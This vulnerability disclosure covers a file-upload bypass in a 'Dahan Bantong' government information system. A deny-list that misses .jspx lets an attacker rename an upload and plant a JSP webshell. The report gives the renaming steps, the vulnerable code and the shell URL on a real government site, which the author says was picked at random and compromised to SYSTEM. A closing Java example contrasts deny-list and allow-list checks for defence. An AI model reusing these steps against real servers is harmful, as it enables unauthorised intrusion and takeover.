### Summary: A Dahan Bantong (大汉版通) system has two file upload points that allow getshell

### Details:

#1 Vulnerable files

There are two file upload points in total, at the following paths:

```
/xxgk/m_5_5/m_5_5_3/upload.jsp
/xxgk/m_5_5/m_5_5_3/import_style.jsp
```

The vulnerable code of one of them is pasted below:

```
<%
ListTable listtable = new ListTable(request);
out.println(listtable.getListTableCssJs());
sys.initSysPara(request);
//* get user information */
Merp_Pub_UserEntity userentity = UserRightBLF.getUserInfo(request);
String strFilePath = application.getRealPath("") + "/m_5_5/m_5_5_3/temp/upload/"; // path where uploaded files are saved
Convert.createDirectory(strFilePath);
CommonUploadFile upload = new CommonUploadFile(strFilePath, "");
boolean bl = false;
String[] strFiles = null;
try {
    SysInit.init();
    if (SysInit.m_strImportNoFileType == null) {
        upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx");
    } else {
        upload.setM_Notfiletype(SysInit.m_strImportNoFileType);
    }
    bl = upload.uploadFile(request);
} catch (Exception e) {
}
if (bl) {
    StyleParse sp = new StyleParse(sys.appId, sys.webId);
    sp.setUserentity(userentity);
    String strXMLFile = "";
    strFiles = upload.getAllFileName();
    if (strFiles != null) {
        for (int i = 0; i < strFiles.length; i++) {
            strXMLFile = strFilePath + strFiles[i];
            // parse the XML file
            sp.importStyle(strXMLFile);
        }
    }
}
%>
```

The key lines are these:

```
String strFilePath = application.getRealPath("") + "/m_5_5/m_5_5_3/temp/upload/"; // path where uploaded files are saved
//...
if (SysInit.m_strImportNoFileType == null) {
    upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx");
} else {
    upload.setM_Notfiletype(SysInit.m_strImportNoFileType);
}
```

Clearly, the program restricts uploads with a blacklist, as follows:

```
upload.setM_Notfiletype("exe,com,bat,php,asp,php3,phtml,jsp,aspx");
```

This stops us from uploading files in .jsp format (other bypass cases are not considered here). But did you know?
A .jspx file is parsed as JSP just the same.

#2 Vulnerability test

OK, now on to testing the vulnerability. A case was picked at random from the internet for testing, here:

```
http://xxgk.weifang.gov.cn/xxgk/m_5_5/m_5_5_3/import_style.jsp
```

As shown in the figure:

![1.jpg](https://images.seebug.org/upload/201405/162208199205adbec6736a20626525122f2bb37c.jpg)

We rename xiao.jspx to xiao.xml and upload it. After submitting, intercept the request and change the file name to 1.jspx, as shown below:

![2.jpg](https://images.seebug.org/upload/201405/16221258c19b15869cb3b4aaac5ca0112d098d55.jpg)

At this point xiao.jspx has been created in the /m_5_5/m_5_5_3/temp/upload/ directory. Visit it: success.

![3.jpg](https://images.seebug.org/upload/201405/16221424b414ea9b0f2832d1bd2fa66e286166a6.jpg)

### Proof of vulnerability:

#Connecting to the shell

```
http://xxgk.weifang.gov.cn/xxgk//m_5_5/m_5_5_3/temp/upload/xiao.jspx
```

As shown in the figure:

![4.jpg](https://images.seebug.org/upload/201405/1622170850ab08d0a46ced655573cd7cd6180c85.jpg)

Highest privileges, too.

```
[*] 基本信息 [ A:C:D:E:F: ]
D:\*****\tomcat\webapps\xxgk\> whoami
nt authority\system
```
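As an added example for this write-up (not code from the report or from the vendor's product; the class and method names are hypothetical), the Java below re-creates the deny-list check described in the vulnerable-file section and places an allow-list check beside it, showing that a name like xiao.jspx passes the former and is rejected by the latter.

```java
import java.util.Arrays;
import java.util.HashSet;
import java.util.Locale;
import java.util.Set;

// Hypothetical re-creation of the deny-list logic the report describes,
// placed beside an allow-list check. Not the vendor's CommonUploadFile code.
public class UploadExtensionCheck {

    // Default deny-list quoted in the report.
    static final String DENY_LIST = "exe,com,bat,php,asp,php3,phtml,jsp,aspx";

    // The import handler only ever hands the saved file to an XML style
    // parser, so "xml" is the only type this endpoint legitimately needs.
    static final Set<String> ALLOW_LIST = new HashSet<>(Arrays.asList("xml"));

    // Lower-cased extension after the last dot, or "" when there is none.
    static String extensionOf(String fileName) {
        int dot = fileName.lastIndexOf('.');
        if (dot < 0 || dot == fileName.length() - 1) {
            return "";
        }
        return fileName.substring(dot + 1).toLowerCase(Locale.ROOT);
    }

    // Deny-list check: anything not explicitly listed is accepted, which is
    // why "jspx" slips through a list that only names "jsp".
    static boolean denyListAccepts(String fileName) {
        Set<String> denied = new HashSet<>(Arrays.asList(DENY_LIST.split(",")));
        return !denied.contains(extensionOf(fileName));
    }

    // Allow-list check: anything not explicitly expected is rejected.
    static boolean allowListAccepts(String fileName) {
        return ALLOW_LIST.contains(extensionOf(fileName));
    }

    public static void main(String[] args) {
        // Constructed sample file names; the server-side check must run on the
        // name in the submitted request, since that is what was altered in the report.
        String[] names = { "style.xml", "xiao.jspx", "page.jsp", "README" };
        for (String name : names) {
            System.out.printf("%-10s deny-list accepts: %-5s allow-list accepts: %s%n",
                    name, denyListAccepts(name), allowListAccepts(name));
        }
    }
}
```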